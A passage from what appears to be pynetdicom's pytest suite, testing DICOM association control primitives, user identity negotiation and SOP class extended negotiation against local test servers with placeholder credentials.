self.assoc.requestor.requested_contexts = [build_context("1.2.840.10008.1.1")]
def test_send_request(self):
"""Test A-ASSOCIATE (rq) construction and sending"""
acse = ACSE(self.assoc)
role = SCP_SCU_RoleSelectionNegotiation()
role.sop_class_uid = "1.2.840.10008.1.1"
role.scu_role = True
role.scp_role = False
self.assoc.requestor.add_negotiation_item(role)
acse.send_request()
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert primitive.application_context_name == "1.2.840.10008.3.1.1.1"
assert primitive.calling_ae_title == "TEST_LOCAL"
assert primitive.called_ae_title == "TEST_REMOTE"
assert primitive.calling_presentation_address == ("127.0.0.1", 11112)
assert primitive.called_presentation_address == ("127.0.0.2", 11113)
cx = primitive.presentation_context_definition_list
assert len(cx) == 1
assert cx[0].abstract_syntax == "1.2.840.10008.1.1"
user_info = primitive.user_information
assert len(user_info) == 3
for item in user_info:
if isinstance(item, MaximumLengthNotification):
assert item.maximum_length_received == 31682
elif isinstance(item, ImplementationClassUIDNotification):
assert item.implementation_class_uid == (PYNETDICOM_IMPLEMENTATION_UID)
elif isinstance(item, ImplementationVersionNameNotification):
assert item.implementation_version_name == (
PYNETDICOM_IMPLEMENTATION_VERSION.encode("ascii")
)
elif isinstance(item, SCP_SCU_RoleSelectionNegotiation):
assert item.sop_class_uid == "1.2.840.10008.1.1"
assert item.scu_role is True
assert item.scp_role is False
@pytest.mark.parametrize("source", (0x00, 0x02))
def test_send_abort(self, source):
"""Test A-ABORT construction and sending"""
acse = ACSE(self.assoc)
acse.send_abort(source)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ABORT)
assert primitive.abort_source == source
def test_send_abort_raises(self):
"""Test A-ABORT construction fails for invalid source"""
acse = ACSE(self.assoc)
msg = r"Invalid 'source' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_abort(0x01)
@pytest.mark.parametrize("reason", (0x00, 0x01, 0x02, 0x04, 0x05, 0x06))
def test_send_ap_abort(self, reason):
"""Test A-P-ABORT construction and sending"""
acse = ACSE(self.assoc)
acse.send_ap_abort(reason)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_P_ABORT)
assert primitive.provider_reason == reason
def test_send_ap_abort_raises(self):
"""Test A-P-ABORT construction fails for invalid reason"""
acse = ACSE(self.assoc)
msg = r"Invalid 'reason' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_ap_abort(0x03)
@pytest.mark.parametrize("result, source, reasons", REFERENCE_REJECT_GOOD)
def test_send_reject(self, result, source, reasons):
"""Test A-ASSOCIATE (rj) construction and sending"""
acse = ACSE(self.assoc)
for reason in reasons:
acse.send_reject(result, source, reason)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert primitive.result == result
assert primitive.result_source == source
assert primitive.diagnostic == reason
def test_send_reject_raises(self):
"""Test A-ASSOCIATE (rj) construction invalid values raise exception"""
acse = ACSE(self.assoc)
msg = r"Invalid 'result' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_reject(0x00, 0x00, 0x00)
msg = r"Invalid 'source' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_reject(0x01, 0x00, 0x00)
msg = r"Invalid 'diagnostic' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_reject(0x01, 0x01, 0x00)
def test_send_release(self):
"""Test A-RELEASE construction and sending"""
acse = ACSE(self.assoc)
acse.send_release(is_response=False)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_RELEASE)
assert primitive.result is None
acse.send_release(is_response=True)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_RELEASE)
assert primitive.result == "affirmative"
def test_send_accept(self):
"""Test A-ASSOCIATE (ac) construction and sending"""
acse = ACSE(self.assoc)
# So we have the request available
acse.send_request()
self.assoc.accepted_contexts = [build_context("1.2.840.10008.1.1")]
self.assoc.rejected_contexts = []
acse.send_accept()
self.assoc.dul.queue.get() # The request
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert primitive.application_context_name == "1.2.840.10008.3.1.1.1"
assert primitive.calling_ae_title == "TEST_LOCAL"
assert primitive.called_ae_title == "TEST_REMOTE"
assert primitive.result == 0x00
assert primitive.result_source == 0x01
cx = primitive.presentation_context_definition_results_list
assert len(cx) == 1
assert cx[0].abstract_syntax == "1.2.840.10008.1.1"
REFERENCE_USER_IDENTITY_REQUEST = [
# (Request, response)
# Request: (ID type, primary field, secondary field, req_response)
# Response: (is_valid, server response)
# Username
# (User ID Type, Primary Field, Secondary Field, Response Requested)
# (Is valid, positive response value)
((1, b"username", b"", False), (True, b"\x01\x01")),
((1, b"username", b"", True), (True, b"\x01\x01")),
((1, b"username", b"invalid", False), (True, b"\x01\x01")),
((1, b"username", b"invalid", True), (True, b"\x01\x01")),
# Username and password
((2, b"username", b"", False), (True, b"\x01\x02")),
((2, b"username", b"", True), (True, b"\x01\x02")),
((2, b"username", b"password", False), (True, b"\x01\x02")),
((2, b"username", b"password", True), (True, b"\x01\x02")),
# Kerberos service ticket
((3, b"\x00\x03", b"", False), (True, b"\x01\x03")),
((3, b"\x00\x03", b"", True), (True, b"\x01\x03")),
((3, b"\x00\x03", b"invalid", False), (True, b"\x01\x03")),
((3, b"\x00\x03", b"invalid", True), (True, b"\x01\x03")),
# SAML assertion
((4, b"\x00\x04", b"", False), (True, b"\x01\x04")),
((4, b"\x00\x04", b"", True), (True, b"\x01\x04")),
((4, b"\x00\x04", b"invalid", False), (True, b"\x01\x04")),
((4, b"\x00\x04", b"invalid", True), (True, b"\x01\x04")),
# JSON web token
((5, b"\x00\x05", b"", False), (True, b"\x01\x05")),
((5, b"\x00\x05", b"", True), (True, b"\x01\x05")),
((5, b"\x00\x05", b"invalid", False), (True, b"\x01\x05")),
((5, b"\x00\x05", b"invalid", True), (True, b"\x01\x05")),
]
class TestUserIdentityNegotiation:
"""Tests for User Identity Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_check_usrid_not_implemented(self, req, rsp):
"""Check _check_user_identity if user hasn't implemented."""
self.ae = ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
assoc.requestor.add_negotiation_item(item)
is_valid, response = assoc.acse._check_user_identity()
assert is_valid is True
assert response is None
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_check_usrid_not_authorised(self, req, rsp):
"""Check _check_user_identity if requestor not authorised"""
def handle(event):
return False, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 2
ae.dimse_timeout = 2
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is False
assert response is None
assoc.release()
scp.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_check_usrid_authorised(self, req, rsp):
"""Check _check_user_identity if requestor authorised"""
def handle(event):
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
if req[3] is True and req[0] in [3, 4, 5]:
assert isinstance(response, UserIdentityNegotiation)
assert response.server_response == rsp[1]
else:
assert response is None
assoc.release()
scp.shutdown()
def test_check_usrid_callback_exception(self):
"""Check _check_user_identity if exception in callback"""
def handle(event):
raise ValueError
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = 1
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is False
assert response is None
assoc.release()
scp.shutdown()
def test_check_usrid_none(self):
"""Check _check_user_identity if exception in callback"""
def handle(event):
raise ValueError
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
assert response is None
assoc.release()
scp.shutdown()
def test_check_usrid_server_response_exception(self):
"""Check _check_user_identity exception in setting server response"""
def handle(event):
return True, 123
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
assert response is None
assoc.release()
scp.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_handler(self, req, rsp):
"""Test the handler bound to evt.EVT_USER_ID"""
attrs = {}
def handle(event):
attrs["assoc"] = event.assoc
attrs["user_id_type"] = event.user_id_type
attrs["primary_field"] = event.primary_field
attrs["secondary_field"] = event.secondary_field
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
if req[3] is True and req[0] in [3, 4, 5]:
assert isinstance(response, UserIdentityNegotiation)
assert response.server_response == rsp[1]
else:
assert response is None
assoc.release()
assert attrs["user_id_type"] == req[0]
assert attrs["primary_field"] == req[1]
assert attrs["secondary_field"] == req[2]
assert attrs["assoc"] == scp_assoc
scp.shutdown()
def test_functional_authorised_response(self):
"""Test a functional workflow where the user is authorised."""
def handle(event):
return True, b"\x00\x01"
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_functional_authorised_no_response(self):
"""Test a functional workflow where the user is authorised."""
def handle(event):
return True, None
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_functional_not_authorised(self):
"""Test a functional workflow where the user isn't authorised."""
def handle(event):
return False, None
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 1
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_rejected
scp.shutdown()
def test_req_response_reject(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return True, b"\x00\x01"
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.require_calling_aet = ["HAHA NOPE"]
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_rejected
assert assoc.acceptor.user_identity is None
assoc.release()
scp.shutdown()
def test_req_response_no_user_identity(self):
"""Test requestor response if no response from acceptor."""
def handle(event):
return True, None
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assert assoc.acceptor.user_identity is None
assoc.release()
scp.shutdown()
def test_req_response_user_identity(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return True, b"\x00\x01"
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assert assoc.acceptor.user_identity.server_response == b"\x00\x01"
assoc.release()
scp.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_logging(self, req, rsp):
"""Test the logging output works with user identity"""
def handle(event):
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
if req[0] == 2:
item.secondary_field = req[2] or b"someval"
else:
item.secondary_field = req[2]
item.positive_response_requested = req[3]
assoc = ae.associate("localhost", 11112, ext_neg=[item])
if assoc.is_established:
assoc.release()
scp.shutdown()
class TestSOPClassExtendedNegotiation:
"""Tests for SOP Class Extended Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_check_ext_no_req(self):
"""Test the an empty SOP Extended request"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {}
scp_assoc = scp.ae.active_associations[0]
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
assoc.release()
scp.shutdown()
def test_check_ext_default(self):
"""Test the default handler bound to evt.EVT_SOP_EXTENDED"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
scp.shutdown()
def test_check_ext_user_implemented_none(self):
"""Test the handler returning the request"""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert len(rsp) == 2
# Can't guarantee order
for item in rsp:
if item.sop_class_uid == "1.2.3":
assert item.service_class_application_information == b"\x00\x01"
else:
assert item.sop_class_uid == "1.2.4"
assert item.service_class_application_information == b"\x00\x02"
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_raises(self):
"""Test exception raised by handler"""
def handle(event):
raise ValueError
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_type(self):
"""Test bad type returned by handler"""
def handle(event):
return b"\x01\x02"
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_item_value(self):
"""Test bad value returned by handler"""
def handle(event):
out = {}
for k, v in event.app_info.items():
if k == "1.2.3":
out[k] = 1234
else:
out[k] = v
return out
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert len(rsp) == 1
assert rsp[0].sop_class_uid == "1.2.4"
assert rsp[0].service_class_application_information == b"\x00\x02"
assoc.release()
scp.shutdown()
def test_functional_no_response(self):
"""Test a functional workflow with no response."""
attrs = {}
def handle(event):
attrs["app_info"] = event.app_info
return None
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assoc.release()
app_info = attrs["app_info"]
for k, v in app_info.items():
if k == "1.2.3":
assert v == b"\x00\x01"
else:
assert k == "1.2.4"
assert v == b"\x00\x02"
scp.shutdown()
def test_functional_response(self):
"""Test a functional workflow with response."""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_req_response_reject(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.require_calling_aet = ["HAHA NOPE"]
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_rejected
assert assoc.acceptor.sop_class_extended == {}
assoc.release()
scp.shutdown()
def test_req_response_no_response(self):
"""Test requestor response if no response from acceptor."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assert assoc.acceptor.sop_class_extended == {}
assoc.release()
scp.shutdown()
def test_req_response_sop_class_ext(self):
"""Test requestor response if response received."""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
rsp = assoc.acceptor.sop_class_extended
assert "1.2.3" in rsp
assert "1.2.4" in rsp
assert len(rsp) == 2
assert rsp["1.2.3"] == b"\x00\x01"
assert rsp["1.2.4"] == b"\x00\x02"
assoc.release()
scp.shutdown()
class TestSOPClassCommonExtendedNegotiation:
"""Tests for SOP Class Extended Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_check_ext_no_req(self):
"""Test the default handler for evt.EVT_SOP_COMMON"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {}
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_check_ext_default(self):
"""Test the default handler implementation"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_check_ext_user_implemented_none(self):
"""Test handler returning request"""
def handle(event):
return event.items
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
scp_assoc.requestor.user_information.extend(items.values())
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == items
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_raises(self):
"""Test exception in handler"""
def handle(event):
raise ValueError
return event.items
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
scp_assoc.requestor.user_information.extend(items.values())
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_type(self):
"""Test bad type returned by handler"""
def handle(event):
return b"\x00\x01"
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
